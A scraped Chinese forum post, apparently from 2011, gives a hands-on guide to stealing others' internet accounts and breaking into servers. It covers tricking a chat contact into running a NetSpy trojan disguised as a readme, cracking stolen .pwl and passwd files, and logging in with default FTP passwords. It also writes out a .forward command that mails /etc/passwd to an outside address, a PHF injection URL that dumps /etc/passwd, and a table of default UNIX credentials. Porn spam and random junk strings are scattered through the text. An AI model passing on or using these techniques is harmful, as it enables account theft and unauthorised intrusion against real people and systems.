国产十八禁AV网站,欧美日韩亚洲国产综合乱,亚洲国产aⅴ成人精品无吗,秋霞午夜福利影院合集


       找回密碼
       注冊(cè)

      QQ登錄

      只需一步,快速開始

      如何得到別人的上網(wǎng)帳號(hào)和密碼

      [復(fù)制鏈接]
      1#
      發(fā)表于 2011-1-12 21:03:35 | 只看該作者 |倒序?yàn)g覽 |閱讀模式
      如何得到別人的上網(wǎng)帳號(hào)和密碼,我在這里介紹幾種弱智方法。. ~5 |' y5 I8 E; F1 V8 }0 `% A' q
      方案一:利用特洛伊木馬得到帳號(hào)。必備工具:NTESPY、PWLVIEW。9 J" r, C* q# i( T* n
      優(yōu)點(diǎn):只要對(duì)方運(yùn)行了程序就有80%的成功率,而且不需要任何網(wǎng)絡(luò)入侵知識(shí),只要能熟悉的操作上面兩個(gè)軟件即可。NETSPY是全中文軟件,一看就會(huì)。而PWLVIEW又是弱智操作只要在DOS下輸入PWLVIEW然后按回車即可。成功率高,操作簡(jiǎn)單而且用不了多長(zhǎng)時(shí)間是它最大的優(yōu)點(diǎn),只是......
      - t) o6 K$ y6 p$ p! `缺點(diǎn):只有一個(gè),那就是如何讓對(duì)方乖乖的運(yùn)行你的程序。
      ) n# i+ ^6 L0 g8 M8 X; i% n提示:先問(wèn)清你的目標(biāo)和你是不是在一個(gè)城市。2 h; s; M. E1 q7 f$ m# u# N
      實(shí)戰(zhàn)演戲:一天,我在X海聊天室里尋找目標(biāo),遇見(jiàn)了同在北京的色鵝丟丟。我上前打招呼:丟丟好呀。丟丟說(shuō):你好呀。我又說(shuō):XXXXXXX(客套話,先和他拉關(guān)系)對(duì)了,我拿到了一個(gè)新程序,要不要看看?丟丟說(shuō):好呀,寄給我吧。
      7 Q8 T: P6 I& [哈哈,魚上鉤了!先把誘餌程序改個(gè)名,如改成readme之類的東東,然后和一些不相干的東西發(fā)過(guò)去,然后你讓他先運(yùn)行README。在這插一句,有一位大俠使用此法時(shí),竟然把控制端程序和NETSPY的說(shuō)明文件一起發(fā)了過(guò)去,真搞不懂他怎么想的。我對(duì)他說(shuō),你先運(yùn)行README,是中文說(shuō)明。丟丟說(shuō):好...咦,怎么沒(méi)反映呀?(YEAH!)我又說(shuō):那你直接運(yùn)行軟件吧。丟丟說(shuō):好吧...不錯(cuò)...我說(shuō):明天見(jiàn)...開始干活,連上他的機(jī)子后,現(xiàn)在C盤里找到了WIN95的目錄WINDOWS。也有可能是WIN95或WIN98,進(jìn)入后查找*.pwl,然后把所有后綴名為PWL的文件都抓過(guò)來(lái),放在你的工具PWLVIEW的子目錄里。在DOS窗口下輸入PWLVIEW然后敲回車,丟丟的上網(wǎng)帳號(hào)和密碼就都顯示出來(lái)了。而且以后如果他上網(wǎng),NETSPY就會(huì)通知你,他就再也逃不出你的手掌心了。就算是他換了密碼,你也能在2分鐘內(nèi)再把他搞定。; |" s. T' n% ~
      忠告:你用他的帳號(hào)上網(wǎng)后第一件事就是先去查看他的上網(wǎng)時(shí)間。分析一下他一般幾點(diǎn)上網(wǎng)以避免撞車。, Q2 F1 P8 L5 O( S
      方案二:利用ISP的疏忽做文章舉。例用工具:EMAILCRK或網(wǎng)絡(luò)刺客
      2 H+ d7 k' s  _' s/ X/ j優(yōu)點(diǎn):沒(méi)什么優(yōu)點(diǎn): t5 i& o9 ?) Q' [7 O8 i
      缺點(diǎn):要具體情況具體對(duì)待,太麻煩
      5 `% `( G+ x* L1 v3 M, X/ D0 {' }6 X提示:平時(shí)多多留神。
      ! p! ^, u6 S" h' J3 G  k  l譬如,某個(gè)ISP給你開好了帳號(hào),然后又畫蛇添足的給你一個(gè)郵箱,地址是:你的帳號(hào)@xxx.net0 N- Z: [0 S' V4 |' m# K/ R1 D
      密碼和你的上網(wǎng)密碼一樣。也就是說(shuō),只要你能敲開郵箱的密碼就一切OK了。
      6 J6 a% b$ S0 B& @+ p運(yùn)行EMAILCRK或網(wǎng)絡(luò)刺客,套上字典后就等著。一般沒(méi)有XX個(gè)小時(shí)搞不定,不成功的可能性很大,而且破解時(shí)還必須要上網(wǎng)。你的機(jī)子要是快可以開上三四個(gè)窗口,套上不同的字典一起破# X9 b) W5 z' A! t; a% M/ v. s
      方案三:侵入郵局主機(jī)然后把PASS檔抓回來(lái),然后用JOHN或JACK套上字典開始破。
      ) R+ G' z, C1 F" [3 x1 p4 K優(yōu)點(diǎn):一次可以破出好多帳號(hào),而且如果運(yùn)氣好還能拿到ROOT,這個(gè)主機(jī)就要?dú)w你控制了。而且破解時(shí)不用上網(wǎng),可以好幾臺(tái)機(jī)子一起破。
      2 v! @5 ~( s" E4 H6 m缺點(diǎn):對(duì)于初學(xué)者有一定困難,尤其是只想拿一個(gè)上網(wǎng)帳號(hào)這樣做恐怕會(huì)得不償失。而且被發(fā)現(xiàn)的可能性很大,情節(jié)嚴(yán)重且性質(zhì)惡劣,一定要慎重對(duì)待。$ p1 f0 `% U2 w) i. ?/ h6 N4 K- M
      由于介紹此類的教學(xué)文章比較多,我就不班門弄斧了。
      $ D  }1 {) W# }) {- J  X; T1 X+ ^: @: s" `
      哈哈,我來(lái)說(shuō)說(shuō)最簡(jiǎn)單的入侵方法。其實(shí)入侵大體的原理相同,主要是利用系統(tǒng)的漏洞(BUG)來(lái)做文章。
      / j5 T2 s) L! ^: G# G# e只不過(guò)有的網(wǎng)站漏洞難找有的好找而已。一個(gè)好的黑客,就是要能很快的發(fā)現(xiàn)漏洞并加以利用。下面我給大家舉一個(gè)小栗子。! F3 |. [0 V3 V( g, N8 y
      有一天,我去XX熱線申請(qǐng)主頁(yè),發(fā)現(xiàn)那里采用的是機(jī)器自動(dòng)回信,信的大概格式如下:
      & D, L1 V8 n" P/ p: D7 `
      - z/ }: l9 M# M: L, p3 i; x------------------------------
      4 E8 t' Z( M2 v1 I
      ' q1 w" v" X/ ]- G& I2 ^* DXXX,你好(XX是你在表格上填的名字)3 u$ c/ k" J: C9 g& B+ A: f
      你在XX熱線的主頁(yè)空間已開通) C+ W+ K/ O- U) Q
      帳戶名:XXX 密碼:11
      . M  m) M6 n3 K/ A-----------XX熱線# ?! m- K4 N' v' C1 _" [
      電話:XXXX-XXXXXXXX; z2 w- q4 j7 e3 q- l
      ------------------------------
      7 n: J& s- @$ d. {/ t2 B
      2 Y9 u- c. Q4 T" X. S好了,由于是機(jī)器回信,所以那里所有人的初始密碼都是11,而且該熱線要更改密碼要TELNET到郵局主機(jī)去改,有許多網(wǎng)友并沒(méi)有接觸過(guò)如何T主機(jī),所以他們使用的還是初始密碼11。
      - `5 Y1 B. i& ?% i1 m開始干活了,打開FTP軟件,輸入XX熱線的IP,密碼11,然后挨個(gè)輸入帳戶名。帳戶名可去XX熱線的主頁(yè)空間列表里查看,先試試AAAA,。。。沒(méi)成功,再換一個(gè),AABB。。。還是不行。哈哈,這個(gè)用戶名短,沒(méi)準(zhǔn)能行。輸入AA。。。進(jìn)去了。寄下用戶名然后繼續(xù)試,ABC。。。又成功了,看來(lái)沒(méi)改密碼的人很多呀。試幾個(gè)就行了,現(xiàn)在,你已經(jīng)擁有這些帳戶的控制權(quán)了。0 a2 Z/ m" S2 e" Y
      上面的這個(gè)栗子很簡(jiǎn)單,一般象這么大的漏很難找。要侵入一個(gè)稍微象點(diǎn)話的站臺(tái)就要耗費(fèi)你大量的時(shí)間和金錢,而且還未必能成功。即使成功了,你不改它實(shí)在無(wú)趣,改了恐怕會(huì)步馬X的后塵。此人侵入貴陽(yáng)的主機(jī)并把界面換成了一張淫穢圖片。害的自己吃飯不用花錢了。所以我在這里勸大家一句,把這方面的精力放到全心全意為人民服務(wù)上去。實(shí)在不行就去聊天室,看誰(shuí)不聽(tīng)話就炸他,同樣很過(guò)癮的!
      4 t  |5 @  r/ {) s; i/ j  
      ! p/ M* S5 }) h" ~7 D( g1 M. e1 f2 Y# O
                                 如何獲得第一個(gè)帳號(hào)1 B5 T+ L/ }; o: p! C. n
      / q/ |+ l8 M2 x
      我們這種水平不高的黑客入侵都是先得到系統(tǒng)的一個(gè)有效帳號(hào),進(jìn)入后再利用系統(tǒng)BUG得到ROOT權(quán)限或想辦法得到SHADOW再解密.無(wú)論是利用系統(tǒng)漏洞還是得到SHADOW都是有一定規(guī)律可尋的,通常你到一些黑客站點(diǎn)找到對(duì)應(yīng)系統(tǒng)相應(yīng)版本的EXPLOIT編譯后執(zhí)行就行了.我感覺(jué)最困難的是獲得第一個(gè)有效的帳號(hào),有時(shí)侯費(fèi)盡力氣也得不到,后來(lái)總算是積累了一些經(jīng)驗(yàn),想寫出來(lái)和大家交流一下,希望能拋磚引玉,請(qǐng)高手們把更好的方法告訴我.
      ; d& A& D. Z# B$ i! h+ Q- t  v1 n3 l5 W- k
      確定了目標(biāo)以后,我通常是先用匿名FTP去看一下,許多網(wǎng)站都開匿名FTP,帳號(hào)用ANONYMOUS或是FTP,密碼用一個(gè)EMAIL帳號(hào)(當(dāng)然是假的),進(jìn)入后到/etc目錄下把PASSWD拿回來(lái),一般情況下都是一份很不全的名單,只有幾個(gè)系統(tǒng)帳號(hào),那就算白來(lái)了:-}但有的時(shí)候會(huì)有比較傻的管理員把一些普通帳號(hào)放進(jìn)去,這就是很重要的信息,雖然只有帳號(hào)沒(méi)有密碼,但畢竟邁出了第一步.如果FTP主目錄是drwxr-xr-x,做一個(gè).foward文件傳上去,在UNIX下的命令應(yīng)該是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail [email protected]" > .forward然后給匿名用戶寫一封信,它會(huì)把PASSWD發(fā)給你。. F$ E0 d  j* a* Q) {4 c" W
      9 T; J. T6 h! t$ R# Z; i( U5 B; G4 B
      如果目標(biāo)沒(méi)有匿名FTP,就通過(guò)WWW訪問(wèn)它的主頁(yè),看看上面有什么信息,例如通過(guò)一些聯(lián)系人的EMAIL你就可以發(fā)現(xiàn)一些帳號(hào),有的網(wǎng)頁(yè)上甚至列出了EMAIL通訊錄,這對(duì)黑客來(lái)講就是無(wú)價(jià)之寶.把這些帳號(hào)記下來(lái),非常有用.
      ; X( \% a% |# t9 r
      - I) w$ P1 ~* U$ L+ y以上幾個(gè)方法都不行的話,那就試試PHF查詢.在瀏覽器的地址欄輸入http://攻擊目標(biāo)/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的話會(huì)顯示出PASSWD來(lái),但是成功率極低:-< ! w! Z; }0 T0 F  L9 K2 O

      2 v5 p' k1 i3 k8 g' P$ V* Y' N還可以利用目標(biāo)的FINGER功能來(lái)積累帳號(hào),如利用HAKTEK(一種掃描器)來(lái)監(jiān)視目標(biāo),一旦有人登陸該主機(jī)就會(huì)報(bào)告給你.但這種方法的缺點(diǎn)就是浪費(fèi)時(shí)間,如果你是自己花錢上網(wǎng)的話可就要出血了!- N8 a* w# d% O8 p6 h0 }

      ; j6 U) U1 D& a! Z3 O- _很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系統(tǒng)默認(rèn)的帳號(hào),例如:: W  T4 O/ t6 s: z* \1 S: n3 r
      ' {7 X' m5 V# n5 A, W8 s
      帳號(hào)     密碼: n  t6 s* Z& f8 a/ i4 u
      ----------- ----------------
      1 Q! {! C5 j. h9 M/ ?" U# oroot    root2 K# @7 u6 V3 n) T5 t
      sys     sys/system/bin
      3 R! `' J* H- j7 Bbin     sys/bin+ H: o  a" G( `1 a. Q; p
      mountfsys  mountfsys
      1 {% P5 v  t+ z( o4 Q  oadm     adm' m* x, h) H; Y9 V3 |2 k# v: g
      uucp    uucp
      6 Z" a- N. W" t0 w6 G  Q6 Jnuucp    anon
        h9 U; A3 p% U0 h. I1 u' x# G/ E* lanon    anon
      / u/ G4 G; z4 F' S+ t% ]1 euser    user
        p: G. M8 e2 |3 ^games    games. R' G, P+ H) ~, I, r) y
      install   install9 I* H% Z, k$ e0 g
      reboot   給 "command login" 用的* P6 n+ I8 M3 L; \( D: n+ y, i+ y
      demo    demo
      / C5 o5 H+ P  P+ |  }* M& iumountfsys umountfsys
      ; ~3 _% U3 }. g# {- T+ usync     sync
      8 d3 x2 j- L2 Kadmin    admin  P) W0 o6 [, d; b
      guest    guest) F) Z6 N7 m  a
      daemon   daemon
      ( t, A8 L4 E5 z/ d$ f________________________________________________________________
      9 z" A2 n- M1 D) [  J0 a% o0 R& c3 R/ g5 ~* O) a) \
      有些管理員忘記把他們改掉,那你就發(fā)財(cái)了!
      ' B& @% |* h  f' o/ j, X9 k' I8 c  K3 V# }% F
      另外還有一些習(xí)慣性帳號(hào)如:test,www,html,web,oracle,setup,sybase,john,tom等也都應(yīng)該試一試.$ c$ }* ~  ^6 v/ ?1 x5 y
      " V! A% _( ^$ t+ X
      只有帳號(hào)還不能進(jìn)入系統(tǒng),但有了帳號(hào)搞密碼就容易一些了,主要辦法還是猜.如果是通過(guò)PASSWD知道帳號(hào)的那你應(yīng)該會(huì)發(fā)現(xiàn)該用戶的許多信息,例如:! g0 ^* Q* o7 G' {3 h/ E9 \
      & q7 G+ [2 w. w, n6 N+ Y
      .........9 Y, N4 ?: N$ D) O( l

      7 _) u+ |/ T" m) j0 D6 B+ a0 oxlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
      4 N' }9 I5 j9 r  J: u# P+ N4 k4 V3 f; m( Z6 n
      qingyuan:x:275:50::/usr/qingyuan:/bin/sh
      , A. G# K0 @# E" D/ ~5 f
      - D. z2 e+ M4 G& L( h+ d0 [hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh
      2 ]$ O: r4 N# O5 Y1 l0 S% G
      9 D2 ^6 Y+ P& z3 s# h; esmlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh% o$ h, E5 T( }

      : V" Q: `4 D* B/ h8 C: _kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh/ z$ T) E5 ]" }: O9 Y

      3 c9 j5 x- K( g3 c. q& W" Hbrlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh, N( U9 c# C  L3 m; f( c1 @
      4 {( a  @; X! ]. U
      tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh: F. a" S) f/ P* F$ W" d: Z' Z. R

      2 T" q9 X. S5 v2 D- o+ N............" K. j: H, K! S' u. a5 T
      - E5 v# b& L; g, ~( y
      這是一部分PASSWD,從這兒我們可以得到七個(gè)帳號(hào),注意每一行的第五項(xiàng),那是該用戶的真實(shí)姓名,對(duì)!就用它來(lái)做密碼試.成功率還是比較高的.# Q: K1 z2 A6 B! B) ]! a+ E

      * u, M, `' C6 s8 j; u+ }9 ]) Z如果是用其他方法獲得帳號(hào)的,就用FINGER查詢來(lái)獲得相關(guān)信息.例如知道一個(gè)帳號(hào)support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項(xiàng)來(lái)偵察[email protected]會(huì)獲得很多該帳號(hào)的信息例如真名實(shí)姓,電話號(hào)碼等就用這些做密碼來(lái)猜">如果是用其他方法獲得帳號(hào)的,就用FINGER查詢來(lái)獲得相關(guān)信息.例如知道一個(gè)帳號(hào)support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項(xiàng)來(lái)偵察[email protected]會(huì)獲得很多該帳號(hào)的信息例如真名實(shí)姓,電話號(hào)碼等就用這些做密碼來(lái)猜./ T6 @1 I, e7 A- @& v/ ^! z

      ) e) r1 l! l5 D8 i2 [# I, v當(dāng)然最可能的密碼還是帳號(hào)本身和一些帳號(hào)的變形,如帳號(hào)是john,密碼可能是nhoj,john123,john888等.或是一些簡(jiǎn)單數(shù)字.總之是要費(fèi)一番工夫來(lái)猜的.. z0 }5 O" Y& }  l1 {; g7 T
      " k1 F9 R" Y% j1 f& K9 G
      如果還猜不出密碼,只好用LETMEIN之類的東西來(lái)猜,字典一定要好.否則,你的電話費(fèi)就要.....而且這種方法比較危險(xiǎn),還是不用為好.3 w; D# R$ ^9 I
      ; W2 d) g' v. K' Q: C
      最后實(shí)在不行還有一種比較卑劣的手段,就是給該網(wǎng)站的網(wǎng)管寫封信,想辦法騙他執(zhí)行特洛伊木馬,然后再.......算了,不說(shuō)了.) Q# M) d3 {) D5 I: G
      . T) s. q: p' I
      你可能發(fā)現(xiàn)以上這些方法都不能百分之百的成功,或者說(shuō)成功率是比較低的,因?yàn)槲乙膊恢栏玫姆椒?但我感到一定有一種更好的方法,希望有高手見(jiàn)到此文能告訴我.7 R3 c) q0 f# J* o2 x) _$ f

      6 }  M1 K& ^8 @2 _- U8 [7 ^# l
      您需要登錄后才可以回帖 登錄 | 注冊(cè)

      本版積分規(guī)則

      QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港 ( 魯ICP備19052200號(hào)-1 )

      GMT+8, 2025-4-20 18:05

      Powered by Discuz! X3.5

      © 2001-2025 Discuz! Team.

      快速回復(fù) 返回頂部 返回列表